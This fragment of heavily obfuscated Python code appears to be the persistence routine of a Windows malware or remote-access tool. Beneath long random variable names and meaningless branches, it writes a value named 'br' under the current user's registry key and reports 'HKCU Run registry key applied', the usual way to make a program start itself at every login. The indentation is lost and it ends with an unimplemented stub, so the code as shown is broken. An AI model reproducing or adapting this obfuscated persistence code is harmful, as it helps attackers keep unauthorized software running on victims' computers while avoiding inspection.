qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = 'oMQqaAFXeVtZCsJDFykxjBigOohNxSuHdOzRccwEoaayGJltmJFcpbWOFnOtvczKmPvJVDGiCfnRxOrkCBFHoJQdszfdJpsbmRuSqhVpFgDTLuTLYJvBpHXPjTwrqExI'
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = WqGhLvLxlPvfjWhLDNBZoxWKqCBBHUqTlbMyOJbvzLUAkOpnLXMMSIunahjcMPFaYQArmBZwPRRzXeDfsdUZWcvTZmqMkZHhwnNFWRrucgNWgqayyMqyXIMqFuaABZrJ
WFIKqgbCnztsDtHohfvZNMDcKqDtOugqyVnPwCZCbNOlBfosZOtPVzyiJzFkxbxHAKXrKtGCZXfZDfDgwsIJdYhUzHlejUhnpfzQRfGkiXUlBTYhcfOpnlZcimgEvCOJ = _winreg.OpenKey(HKCU, OFYOrQTjPDMdyMxXbucVEplFSprvdZCBLjTmLnwwyFPfxCRnOzwMgVuhQbWUDugWXCWtFlsAKwqprMqSZyyaAGkBszlDiyRjqqnSIMJTzEqbbAbkVjEPIRpjnmHpzBmk, 0, _winreg.KEY_WRITE)
SJpMMniUQaVRgUAmCZhKSGTZtkuOoOtEEEARWHXXVvDHgjzPUBMiyXbUugZmJCwQGpUtgkbXkrshVfZFJmnaiZqITzXjeRDoVJDWALFtUWiUaOdTdbxszjsYgVJvcDkZ = 'enZzGFdspladIwZnHHGZQnSAekZmpAxzWpxwUErGwCaiOkhpfobbyTPsrpNyNPPWMkCRxJXiIQsiYmOvSJlktHmqOsAfnWOutvCiEvVAlonKLusgXNHwTTwNndmSAsrE'
RnEWhQjHlYtwrBOTUdKhPuUzDBMFbnFNjlIebLoHPPGVOPHrtkwRUxSkULdBXHKLHpnKfEgstMycpABCaehbURoRBqfNjYToYcomylbUdeyOPqdSZNJutPoDcdAfaqGJ = 'voyCWxBORNzspmdhPtaOxhJtWyOfLCdTEhWLWneMDdgJrnpeJgPOFnToWWXQuDZoorGgbSfsaKCsbBIFGkVRaOTLVdqPbsKaAOvFhtdfBKDXZqPvHbHEiHnIfpqthApZ'
TsWmlOYedaIBWGKIuYAKGKIiptXLKMDMbuJeUSRnpyTqDeVcJOquDxPqAxzlukPZNtLDEdbhspuCSvgAIdKIIkFvqEbvIjCgfFUrFaBEruSqOTMnjjOnvynNDCyRBydR = 'RSiNFXxyaWINOtSgGMbBUfNatwoqFxGWOFCXDKWKgltxskAqmxWyjYbggIbnCgMagZOzBtRrjRGvLnyUCKqAbuCmNsBvbhcMCoKqHqabapqqZUnHZjMyLqkFkwllVlYS'
dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg = 'JyxqLphdZhedcNWcZkyjINWbPNzvhMXWCfgQlMaTYruxdEfQphKyeyDbLlqDyLVbEZzKfxWbUNPrxnrGBVsweECluKdAUfyBGRvXALUQfYWKHDelBjKtuYfQLezBGXqu'
SAZWzuVsuYkGmVoFeLvgumzJnTATmgmDhFtohUnLxNIBrmtqHdwGiUpHVDntBuyLhhepeOQqtIcXTNwMymMGeCmBUUmpdwvVlolGbmbMqhTLQjCkwmXIAEcKUspQsrYw = 'DCUGKeKCFKHPTiYGuiwSuHjvnYEgxORkOrVgXKoHyEkPBzpNgFwENCLWdFzUngySzipzyQLXDMNhjAylZYZpvyfzMjsfbJbmmdItpFShpadhGWesOihMxSuQjlIVWOmo'
ReFFBAlKciuTIBfZvxssUrpxIvHndpsTHEoJSpSoAqOvmukEdbOTQxfjutFDVSDRtGeEyIwuPrnZgbdNMWisxPBCreHTDvdOeiQjcPlrcvgKXJlGUDLaJxkxZAcxAJXv = 'mVhcUuuFKOFnhJpaSqeArKXFFJOmAvLYgXAQEImcfoHwzqjunvfCWFoKkFpOzRwlWvBzvFqOlXBddHDrPEIcJnJaxeZMxMfiHDDpjspsDvFTMUVdaAGCzIVcDOtFKjXp'
if TsWmlOYedaIBWGKIuYAKGKIiptXLKMDMbuJeUSRnpyTqDeVcJOquDxPqAxzlukPZNtLDEdbhspuCSvgAIdKIIkFvqEbvIjCgfFUrFaBEruSqOTMnjjOnvynNDCyRBydR == dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg:
for ReFFBAlKciuTIBfZvxssUrpxIvHndpsTHEoJSpSoAqOvmukEdbOTQxfjutFDVSDRtGeEyIwuPrnZgbdNMWisxPBCreHTDvdOeiQjcPlrcvgKXJlGUDLaJxkxZAcxAJXv in SAZWzuVsuYkGmVoFeLvgumzJnTATmgmDhFtohUnLxNIBrmtqHdwGiUpHVDntBuyLhhepeOQqtIcXTNwMymMGeCmBUUmpdwvVlolGbmbMqhTLQjCkwmXIAEcKUspQsrYw:
if ReFFBAlKciuTIBfZvxssUrpxIvHndpsTHEoJSpSoAqOvmukEdbOTQxfjutFDVSDRtGeEyIwuPrnZgbdNMWisxPBCreHTDvdOeiQjcPlrcvgKXJlGUDLaJxkxZAcxAJXv == dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg:
SAZWzuVsuYkGmVoFeLvgumzJnTATmgmDhFtohUnLxNIBrmtqHdwGiUpHVDntBuyLhhepeOQqtIcXTNwMymMGeCmBUUmpdwvVlolGbmbMqhTLQjCkwmXIAEcKUspQsrYw = SJpMMniUQaVRgUAmCZhKSGTZtkuOoOtEEEARWHXXVvDHgjzPUBMiyXbUugZmJCwQGpUtgkbXkrshVfZFJmnaiZqITzXjeRDoVJDWALFtUWiUaOdTdbxszjsYgVJvcDkZ
else:
dVPpDROYllJeOAflPnHYcomIojlQdhdWojsZHLSTXMAdHOnNzKzaxGpSkFNmHMDhwUbxARMcOchAosOePVNBnZzwZfqtGMvGoyTszDSHGLprYpzMfICNtiYujdYjpCIg = RnEWhQjHlYtwrBOTUdKhPuUzDBMFbnFNjlIebLoHPPGVOPHrtkwRUxSkULdBXHKLHpnKfEgstMycpABCaehbURoRBqfNjYToYcomylbUdeyOPqdSZNJutPoDcdAfaqGJ
_winreg.SetValueEx(WFIKqgbCnztsDtHohfvZNMDcKqDtOugqyVnPwCZCbNOlBfosZOtPVzyiJzFkxbxHAKXrKtGCZXfZDfDgwsIJdYhUzHlejUhnpfzQRfGkiXUlBTYhcfOpnlZcimgEvCOJ, 'br', 0, _winreg.REG_SZ, GpscRjtNBjoEOYQCdDQVaNrOQBMYgQDRJYAJiXTcnYCvjLftSUIVpcNKaRIypmqGnfGpyUERCZjOlSWPPkFHcBgfimwkLcUeDjFzABiXjWKZkQLVWvjiTxhQRHqjfdHM)
SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv = 'aczuFUFEtJKVdRDEeWCVTpJUkLJXuUspgyOwAWpIWXAWsjWGOspwtYYANoWocNkMXvrGhTUGtqnDNehclsGriDTLQGCHbCcesxlwlfKiBEaxjalNobNsgnLmRPhUHRsF'
vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ = 'VXHRhgSvpczWmOlslVGZNPKVekRuffXKeYSPErbrCZaOMGlxibqAvnBqXCHVJzWxBsXCtVAHVTuqRKPTVQhSNhxEXMoSLMryXeJDteTojfbUDantuFuOYlcwhkKBOdiP'
KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu = 'htWraAHNhycJERZVlwTorazGVcUYvhSiaEwlmzvrhXwuIPCkdROWrkBmVHyHPApxlUieSfqzRtmFcdaywlvtTlzUYPWhsZNvDyVFzXfCkYUkEkCPzjOWVEKdSfFRkSLj'
sJePUrTyillNzFFIJVihVacRwARaJRTmKkvfyqVVpqynjrWhhtATrsaFHXcQHKNZSJgwSxOXCnryHAEpboPPDbUeJaXBgNeWozSsRbXyvlGfPvsfeeZKTYrxdDxZMjRs = 'CFXDjYTqsSotEteUzKtrxmVEmPWYLokCLEdTXQvItzIbDezcMHgthfZYgKpSEYJBHMZiIkcvnBAVMFuutnHoGyxbmilcLCTchTEPqQbVNQsDPtKFUQQBnNlMYJxrSigA'
vVPccuVHBdpXVAfvMydBKAqVHSVncwkHoxdSZyPyxgbiFEwJwFDVTlVFIzvIEcTKeTpqrdxCAmQpjbopwYpNYfzkzQqzMeMQlCHQduxCJTgmnNUZrBEaDXQIPTLBvdVM = 'kFZPaWMllggqQLVZbmJoWJyWCdfAHeKUnJLpEBUvcsSMIXOfaAPjKVSedjciSsKkGXTuvpcgnHOQwthMOsNPutaTGAumHZLEgHZqAtbwUpJSyDBZshnuZaRbfnLBtfYx'
if SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv in vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ:
SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv = vVPccuVHBdpXVAfvMydBKAqVHSVncwkHoxdSZyPyxgbiFEwJwFDVTlVFIzvIEcTKeTpqrdxCAmQpjbopwYpNYfzkzQqzMeMQlCHQduxCJTgmnNUZrBEaDXQIPTLBvdVM
if vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ in KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu:
vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ = sJePUrTyillNzFFIJVihVacRwARaJRTmKkvfyqVVpqynjrWhhtATrsaFHXcQHKNZSJgwSxOXCnryHAEpboPPDbUeJaXBgNeWozSsRbXyvlGfPvsfeeZKTYrxdDxZMjRs
elif vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ in SXyDLEqiFAdwRnmfYxFGbRFBDBAqvBECkUXzetocmXhbwaXChHThwboetnCBpLAdnZlxfWshBxXGVwKmYCpMOooasuBbjFgeJMNZIiLyXKaLZlILtPhkpUcdpNeWVnpv:
KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu = vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ
if KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu in vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ:
vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ = vVPccuVHBdpXVAfvMydBKAqVHSVncwkHoxdSZyPyxgbiFEwJwFDVTlVFIzvIEcTKeTpqrdxCAmQpjbopwYpNYfzkzQqzMeMQlCHQduxCJTgmnNUZrBEaDXQIPTLBvdVM
_winreg.CloseKey(WFIKqgbCnztsDtHohfvZNMDcKqDtOugqyVnPwCZCbNOlBfosZOtPVzyiJzFkxbxHAKXrKtGCZXfZDfDgwsIJdYhUzHlejUhnpfzQRfGkiXUlBTYhcfOpnlZcimgEvCOJ)
huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA = 'sBeWiykBTgFygWcCwhPntTtEtFNYqIcECfQHNMTmYSMRMecMBjhxhsqyjnVZGskoamfWeSSnfVgxbGSeGsuaffDrtMfRLfmmAKYbSRqUFsfErLUvixqcKJgMwznSSyPV'
zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo = 'mHcBKOulGxPhTEjlaXNfJPtjHdTTdOrRgMfvocWEfqPxOfTFevmjwFGPQlAtlcpndjLkYoTDPyKNgupJpeRamGbwkLQHtvtnTtATzICvIvzGZKxRgwVcIugQSEdwNieQ'
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = 'yVaGyMRYhbDPcdmVTRfduokNIvXRBvaVECCutQNRzJnWJGMmapjDKhUMfyHDaWpYUoKzjYkAnVHodyRIgvikBzYiwwQKHpSJIbXLdjubCkqUQiVgZzrbZQzbloxUSiuz'
PewFbvbRwEftQTjHhqKHvclUoglVACkGIkClhOSZbrlIUxzttbujECeJkoDrVodSZHYFdkujEDYpqOonwaZTeaWdkfhoPFSqcTeWTYqNjafhSYTnoyixFhybazqvsQFh = 'TfAUmHgvUvCQZiNARuqpQzbjQZNNLzlwnPDgDKYXhTrqosQOaigkJOgObKDCMdQEqfzAJWYIHayfXDbCadaJeBbExcdwmlTqGqwIAqCYDoVdzjoQZBPKUGeZKbtqWLcU'
ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz = 'aRutSXfXTCJmPlUOzedzhYbEDDaaqJHsymdjqmhvKMLgflRBkkhMRKzrPPlCzRjTHpSWDhsEPzKRgsyBxCngunrCTYVhyYuveSOhzqvHCMENUyVMhZmynoQEwnzdCMTn'
eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK = 'uSlisUZtioVIJasYRoeLWdVpQUIoUGiPjUVQkIyuxRNywMNAxmgYEFvDTqAqqoxMaFAjFCmhOPSwnvDSnbGtnbGzgaJlszZiTDzWWRmMxHsFIoXBYMFVWueaRytsBZGB'
if huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA != PewFbvbRwEftQTjHhqKHvclUoglVACkGIkClhOSZbrlIUxzttbujECeJkoDrVodSZHYFdkujEDYpqOonwaZTeaWdkfhoPFSqcTeWTYqNjafhSYTnoyixFhybazqvsQFh:
zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo = rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh
for eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK in PewFbvbRwEftQTjHhqKHvclUoglVACkGIkClhOSZbrlIUxzttbujECeJkoDrVodSZHYFdkujEDYpqOonwaZTeaWdkfhoPFSqcTeWTYqNjafhSYTnoyixFhybazqvsQFh:
if eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK != rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh:
zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo = zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo
else:
ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz = huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA
else:
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA
huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA = ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz
if rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh == huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA:
for eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK in huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA:
if eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK == rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh:
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA
else:
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz
return True, 'HKCU Run registry key applied'
except WindowsError:
qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW = 'SMJdMBySYWiaiLlYIZkyTeNBPWgqfqbenlXvTLAKOekCrdyEesQkseLzSADVCpREEwTqtznVdaIBrVoxchBtSwrNzjTlcwcDIWrSaaBNybtxJAklwxaNWpRURwyqvaDM'
cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX = 'bGwqEDcnDYqRSaLQWdecghcXRuJcmSUtvvlsVlhTmSdtUCUaVuDMcTaAeGuzZpPetdhukdUIpJVWuwKYVQRpiSQnIHzxiOYCmCvIRWinDZOKnarrnYeBqOaxcJznIgMk'
ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud = 'XqSWWyintqiBNMGEYRfGAWxsGmNrGyQHtsHJwXLgKxexXmHwuKkviftAFIAtldycHbcXajYHGuNuliFSyTuaGWbuWQdTHUzuhBJdAMlcDDwQONxacbgsQpzXGHCXJjrl'
PUhmnrlBsTpSglatZZADXdzJqBMTVWeEpBeRYgZBbLrAcRQGhsZwsWGpBgVQONXCPpSyfoxutYbbleDJKRdIMAzoJUhzxVRvzOapbpCkRcnwBaBvsubOpprjzHJDYECS = 'gitjdtGiEhjdNamIJMmLyHMqdOEJUGKJlxvOewOWKDMUcFQIZpnJSVtGPkcURHWjQivYKSPXMbAFNsKTShvBgDPMMwJAJNDvPnOwoTHNfOswcByfmIDktHFKluihGHmD'
oVMlYqVYTucdlFaQKWlGDArqwElnutYUuIjJwNnynRyfvRDQywARBbjzgaHzRPwTAlPnJIQijVXnAWQOvOhBEXKCnhzvGYjrYjduJqHKEMZERuFRHEzInhbLXDJqGhoQ = 'QcMaqVARPRvzpDlnckWixcAAizBnLFOPohPizMpXoEtdAXdZlNZdEeprBGMcNaLPTbtandpjMxmFSrTtCTEHpriNfasBHZRRZXBzDBqlYPMomKUvjRFhhFsEKebYWSRW'
if qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW in cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX:
qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW = oVMlYqVYTucdlFaQKWlGDArqwElnutYUuIjJwNnynRyfvRDQywARBbjzgaHzRPwTAlPnJIQijVXnAWQOvOhBEXKCnhzvGYjrYjduJqHKEMZERuFRHEzInhbLXDJqGhoQ
if cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX in ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud:
cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX = PUhmnrlBsTpSglatZZADXdzJqBMTVWeEpBeRYgZBbLrAcRQGhsZwsWGpBgVQONXCPpSyfoxutYbbleDJKRdIMAzoJUhzxVRvzOapbpCkRcnwBaBvsubOpprjzHJDYECS
elif cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX in qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW:
ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud = cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX
if ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud in cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX:
cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX = oVMlYqVYTucdlFaQKWlGDArqwElnutYUuIjJwNnynRyfvRDQywARBbjzgaHzRPwTAlPnJIQijVXnAWQOvOhBEXKCnhzvGYjrYjduJqHKEMZERuFRHEzInhbLXDJqGhoQ
return False, 'HKCU Run registry key failed'
def mvZhXEFKFfgNpNuuGltXFxzkQSecRsRXzlhAQkZglUYprNzQuQHQSeOSyDFiFpSxmwrSdhfQrzzCnTBtWVKKPEWhDTpWhAURMjXmlPYrdZFeLxLfRaSKTXiBjplrpOiC():
    """Unimplemented stub; always reports failure with a placeholder message."""
    succeeded = False
    detail = 'nothing here yet'
    return succeeded, detail
